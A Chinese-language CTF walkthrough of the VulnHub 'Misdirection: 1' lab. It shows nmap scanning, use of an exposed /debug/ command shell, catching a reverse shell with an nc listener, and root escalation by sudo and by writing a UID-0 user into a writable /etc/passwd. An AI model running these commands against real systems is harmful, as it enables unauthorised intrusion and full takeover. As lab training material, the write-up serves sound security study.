[VulnHub靶机渗透] Misdirection: 1

 博主介绍

‍ 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
点赞➕评论➕收藏 == 养成习惯(一键三连)
欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋
作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

前言

一、信息收集

1、主机探测

2、端口扫描

3、漏洞扫描

nmap漏洞扫描

二、渗透测试

1、web渗透+信息收集

2、迁移shell

三、提权

1、sudo提权

2、user.txt

3、root权限


前言

靶机精讲之Misdirection,vulnhub靶机,不难,但开始阶段很容易被误导,渗透目标选择的优先级容易选错以致费时,死磕一点还是快速跳跃,需要权衡、经验和智慧。用webshell获得系统立足点,两次提权获得root权限。这台机器很标准,其中多了一点点曲折和趣味,是高仿真场景的抽象,规模不大,但渗透体验很棒,细节满满。

一、信息收集

1、主机探测

发现靶机IP地址是192.168.103.154

┌──(rootkali)-[~/桌面]
└─# arp-scan -l

[VulnHub靶机渗透] Misdirection: 1_第1张图片

2、端口扫描

扫描靶机,发现靶机开放了22、80、3306、8080端口

┌──(rootkali)-[~/桌面]
└─# nmap -sS -A -p- 192.168.103.154

[VulnHub靶机渗透] Misdirection: 1_第2张图片

3、漏洞扫描

nmap漏洞扫描

利用namp扫描,扫描出来了好几个漏洞,我们可以进行详细分析

┌──(rootkali)-[~/桌面]
└─# nmap --script=vuln -p22,80,3306,8080 192.168.103.154

80端口下的漏洞有:

CSRF:这里的web登录注册页面漏洞扫描是发现csrf,但是比较复杂,并且对我们渗透测试拿root权限来讲,并不是第一选择

sql注入:这里nmap扫描出来sql注入漏洞,后面可以进行证实

[VulnHub靶机渗透] Misdirection: 1_第3张图片

[VulnHub靶机渗透] Misdirection: 1_第4张图片

3306端口:mysql-vuln-cve2012-2122

mysql-vuln-cve2012-2122 是指 MySQL 数据库中的一个漏洞,该漏洞被称为CVE-2012-2122。这个漏洞可以允许未经身份验证的攻击者通过网络连接到 MySQL 服务器并以管理员权限执行任意代码。

只要知道用户名,不断尝试就能够直接登入SQL数据库。

8080端口:扫描出来了很多的web目录,可以尝试访问下

[VulnHub靶机渗透] Misdirection: 1_第5张图片

二、渗透测试

1、web渗透+信息收集

先访问下80端口下的web页面,发现很杂,内容很多,这里面有很多可能是可以找到线索的,但是我们从目前看,我们还可以看看别的方向的线索,比如8080端口,如果8080端口也没有什么有价值的信息,我们就可以再仔细地对80web页面进行挖掘。

一般这种靶场也是框架漏洞也是有的,所以也需要查看下,但是这个靶场是个python的一个框架,也没有在网上找到有关的漏洞情况。

[VulnHub靶机渗透] Misdirection: 1_第6张图片

[VulnHub靶机渗透] Misdirection: 1_第7张图片

我们现在可以访问下8080端口,它是一个很常见的Apache2 Ubuntu Default Page的一个静态页面,对我们的渗透测试来讲价值不大,我们开始利用nmap扫描漏洞的时候,扫描到了很多的目录,我们可以尝试访问下

[VulnHub靶机渗透] Misdirection: 1_第8张图片

我们尝试访问8080的目录,里面很多都是没有价值的目录

[VulnHub靶机渗透] Misdirection: 1_第9张图片

/debug/ 目录下有个命令执行的shell cmd页面,发现可以进行执行命令,我们可以看到是个www-data低权限账户,说明我们后续要进行提权,我们这里可以考虑进行迁移shell

[VulnHub靶机渗透] Misdirection: 1_第10张图片

2、迁移shell

我们需要把8080端口下面的shell迁移到kali攻击机上

先在kali上进行监听

┌──(rootkali)-[~/桌面]
└─# nc -lvnp 1234                                       
listening on [any] 1234 ...

然后在shell上执行迁移shell的命令,这里开始尝试了nc命令,但是没有用,像我们在真实的渗透测试环境中,肯定都会遇到一些命令过滤什么的,不可能说一个命令通吃,所以我给小伙伴们推荐一个自动化写反弹shell或者迁移shell的木马网站

Online - Reverse Shell GeneratorOnline Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.icon-default.png?t=N7T8https://www.revshells.com/

这个网站的页面也是蛮好看的

[VulnHub靶机渗透] Misdirection: 1_第11张图片

像这里面的都是可以进行尝试选择的,我这里是选择python3的环境,因为这个8080端口是apache开发的,所以可以尝试python的命令,进行执行迁移shell操作

[VulnHub靶机渗透] Misdirection: 1_第12张图片

迁移shell成功,但是这个并不是很完美的交互式shell

[VulnHub靶机渗透] Misdirection: 1_第13张图片

三、提权

1、sudo提权

这里利用sudo -l 的命令,直接就发现有一个brexit用户,不需要密码直接利用sudo就可以拿到权限

[VulnHub靶机渗透] Misdirection: 1_第14张图片

用户 www-data 可以在本地主机上使用 brexit 用户执行 /bin/bash 命令,而且不需要密码验证。

sudo -u brexit /bin/bash

[VulnHub靶机渗透] Misdirection: 1_第15张图片

2、user.txt

brexit@misdirection:/var/www/html/debug$ cd /home
cd /home
brexit@misdirection:/home$ ls
ls
brexit
brexit@misdirection:/home$ cd brexit
cd brexit
brexit@misdirection:~$ ls
ls
start-vote.sh  user.txt  web2py
brexit@misdirection:~$ cat user.txt
cat user.txt
404b9193154be7fbbc56d7534cb26339

[VulnHub靶机渗透] Misdirection: 1_第16张图片

3、root权限

.viminfo,像这个文件,我们在做渗透测试的是很好可以注重看下,因为这个文件里面是记录的用户进行利用vim编辑

发现他编辑了/etc/passwd目录,我们查看下/etc/passwd

[VulnHub靶机渗透] Misdirection: 1_第17张图片

发现/etc/passwd具有可写入的权限

brexit@misdirection:~$ ls -la /etc/passwd
ls -la /etc/passwd
-rwxrwxr-- 1 root brexit 1617 Jun  1  2019 /etc/passwd

尝试写入/etc/passwd,创建一个root权限的用户,然后再登录这个用户,就是具有root权限了

brexit@misdirection:~$ openssl passwd -1 123456
openssl passwd -1 123456
$1$N5.ej9Xq$bdRmAv/l.B7qp923jXVk50
brexit@misdirection:~$ cat /etc/passwd |grep root
cat /etc/passwd |grep root
root:x:0:0:root:/root:/bin/bash
brexit@misdirection:~$ routing:$1$N5.ej9Xq$bdRmAv/l.B7qp923jXVk50:0:0:root:/root:/bin/bash


1. `openssl passwd -1 123456`: 这个命令使用 OpenSSL 工具生成密码哈希。`-1` 选项表示使用 MD5 算法,而 `123456` 是要哈希的密码。生成的密码哈希是 `$1$N5.ej9Xq$bdRmAv/l.B7qp923jXVk50`。

2. `cat /etc/passwd |grep root`: 这个命令使用 `cat` 命令打开 `/etc/passwd` 文件并通过 `grep` 过滤器查找包含 "root" 的行。结果是以 "root" 开头的相关行,其中包含了 root 用户的信息。

3. `routing:$1$N5.ej9Xq$bdRmAv/l.B7qp923jXVk50:0:0:root:/root:/bin/bash`: 这是在 `/etc/passwd` 文件中添加的一行。它描述了名为 "routing" 的用户的信息,包括用户名、密码哈希、用户 ID、组 ID、用户主目录和默认 Shell。


成功拿到了root权限

[VulnHub靶机渗透] Misdirection: 1_第18张图片

[VulnHub靶机渗透] Misdirection: 1_第19张图片

你可能感兴趣的:(web,【精选】VulnHub,渗透测试靶场练习平台,安全,web安全,网络,网络安全,vulnhub,渗透测试,测试工具)